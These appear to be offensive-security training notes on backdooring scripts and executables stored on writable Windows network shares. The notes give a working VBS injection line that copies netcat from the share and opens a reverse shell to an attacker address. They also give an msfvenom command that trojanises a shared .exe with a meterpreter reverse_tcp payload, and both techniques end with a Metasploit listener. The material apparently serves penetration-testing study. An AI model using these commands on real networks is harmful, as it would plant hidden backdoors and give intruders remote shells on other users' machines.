Abusing writable shares
Resources
CreateObjectfunction
Wscript.Shellobject
Runmethod
copy
msfvenom
Backdoor mechanism
It is quite common to find network shares that hosts executable or scripts created by the administrator, that users can use to perform daily tasks. This is useful for users since they can execute the shared resource without copying or installing it.
Whenever a user opens the shortcut on their workstation, the executable or script will be copied from the server to the local %temp% folder, where it will be executed. Thus, any payload will run in the context of the final user's workstation and logged-in user account.
If the share is writable by anyone (or at least our compromised account), we can abuse this to create a backdoor.
(1) Backdoor via .vbs scripts
.vbs scriptsGiven that we have found a VBS (.vbs ) script running hosted on the share, we can inject a malicious code into the found script, to provide ourselves with a backdoor.
Step 1
First, we have to upload a binary (such as nc64.exe ) to the share. This will aid us in creating the backdoor. This can be achieved using smbclient.
Step 2
Next, we can inject the malicious commands in the existing script.
The inserted command assumes that the writable share is hosted at
\\TARGET_IP\writable_share.
CreateObject("WScript.Shell").Run "cmd.exe /c copy /y \\TARGET_IP\writable_share\nc64.exe %temp% & %temp%\nc64.exe -e cnd.exe ATTACKER_IP PORT", 0, TrueThe following outlines the main steps:
(1) Create a new Wscript.Shell object and run an external command using the Run method
the Wscript.Shell object provides access to the OS shell methods
According to this page, the following describes the last 2 values provided to the Run method. In our example, the values are 0, True .
intWindowStyle
Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.
value of 0 : "Hides the window and activates another window."
bWaitOnReturn
Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script.
If set to True , script execution halts until the program finishes.
(2) Execute commands using cmd.exe , to call the copy command to copy the uploaded nc64.exe binary (uploaded to share) to the %temp% directory
the
/yflag provided tocopyis used to:
Suppress prompting to confirm that you want to overwrite an existing destination file.
(3) Execute a reverse shell that provides us a backdoor to the system
Step 3
Finally, we have to start a listener using the exploit/multi/handler from Metasploit. Now, we will gain a remote shell on a user's desktop whenever someone executes this script.
(2) Backdoor via .exe files
.exe filesGiven that we have found a Windows binary such as an .exe file, we can download it from the share and use msfvenom to inject a backdoor functionality. The result is a binary that still fulfils its original purpose, but execute an additional payload silently.
Step 1
We can use the downloaded binary as a template to create a new malicious binary (suppose the binary is named vuln.exe):
$ msfvenom --platform windows -x vuln.exe -k -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -b "\x00" -f exe -o mal_vuln.exeStep 2
Finally, we have to start a listener using the exploit/multi/handler from Metasploit. Now, whenever someone executes this script, we will gain a remote shell on that user's desktop. Now, we will gain a remote shell on a user's desktop whenever someone executes the binary.
Last updated